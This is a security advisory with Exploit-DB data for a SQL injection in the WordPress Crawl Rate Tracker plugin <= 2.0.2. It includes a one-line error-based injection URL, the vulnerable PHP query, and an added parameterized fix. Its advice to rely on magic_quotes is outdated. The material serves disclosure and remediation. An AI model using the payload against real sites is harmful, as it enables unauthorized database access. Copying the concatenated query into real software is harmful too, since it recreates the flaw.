Vendor: Crawl Rate Tracker plugin
By: Miroslav Stampar
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Crawl Rate Tracker plugin
Affected Version From: 2.0.0
Affected Version To: 2.0.2
Patch Exists: NO
Related CWE:
CPE: a:wordpress:crawl_rate_tracker:2.0.2
Metasploit:
Other Scripts:
Platforms Tested: WordPress
Year: 2011

WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability

The WordPress Crawl Rate Tracker plugin <= 2.0.2 is vulnerable to SQL injection. The page_url GET parameter handled by sbtracking-chart-data.php is concatenated unescaped into a database query, so a specially crafted request to that file lets an attacker extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, users should ensure that magic_quotes is turned on in their WordPress installation. Additionally, users should update to the latest version of the Crawl Rate Tracker plugin.

Exploit-DB raw data:

# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip
# Version: 2.0.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20

---------------
Vulnerable code
---------------
class b3_chartData extends b3_sbTrackingConfig
{
    public function tracking_bot_report_chart_data()
    {
        ...
        if($_GET['page_url'] != '')
        {
            $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` <= '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`");
            ...

if ($_GET['chart_data']==1) {
    ...
    $chartData = new b3_chartData();
    echo $chartData->tracking_bot_report_chart_data();
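A hardened form of the query shown in the vulnerable code, added here as an example; it is not code from the plugin or its author. It assumes a loaded WordPress environment (the global $wpdb object, wp_unslash(), sanitize_text_field(), DAY_IN_SECONDS, wp_json_encode()), and the table name, the 30-day window and the function name b3_bot_report_chart_rows are assumptions.

```php
<?php
// Added example, not the plugin's code: the advisory's chart query rewritten
// so request values are bound with $wpdb->prepare() instead of concatenated.
// Assumes a loaded WordPress environment ($wpdb, wp_unslash(),
// sanitize_text_field(), DAY_IN_SECONDS, wp_json_encode()). $table is the
// plugin-controlled tracking table name (assumed), never taken from input.

if (!defined('ABSPATH')) {
    exit; // the vulnerable file was callable directly; refuse to run outside WP
}

function b3_bot_report_chart_rows($page_url, $start, $end, $table)
{
    global $wpdb;
    // Undo WordPress's added slashes and strip tags/control characters.
    // This is not what makes it safe (magic_quotes-style escaping never was);
    // prepare() below is.
    $page_url = sanitize_text_field(wp_unslash((string) $page_url));
    if ($page_url === '') {
        return array();
    }
    // %s is quoted and escaped by wpdb, %d is cast to an integer, so a value
    // like  -1' AND EXTRACTVALUE(...)--  is compared as a literal string and
    // never becomes part of the SQL grammar.
    $sql = $wpdb->prepare(
        "SELECT DATE(FROM_UNIXTIME(`visit_time`)) AS `visit_date`,
                `robot_name`, COUNT(*) AS `total`
           FROM `{$table}`
          WHERE `visit_time` >= %d AND `visit_time` <= %d
            AND `page_url` = %s
          GROUP BY `visit_date`, `robot_name`",
        (int) $start,
        (int) $end,
        $page_url
    );
    return $wpdb->get_results($sql);
}
// Entry point mirroring the advisory's chart_data branch. The 30-day window
// and the table name are assumptions; the original derives them elsewhere.
if (isset($_GET['chart_data']) && (int) $_GET['chart_data'] === 1) {
    global $wpdb;
    $end   = time();
    $start = $end - 30 * DAY_IN_SECONDS;
    $rows  = b3_bot_report_chart_rows(
        isset($_GET['page_url']) ? $_GET['page_url'] : '', $start, $end,
        $wpdb->prefix . 'sbtracking'
    );
    echo wp_json_encode($rows);
}
```

With the value bound through prepare(), the PoC's page_url payload is stored and compared as an ordinary string, so the fix does not depend on the magic_quotes setting at all.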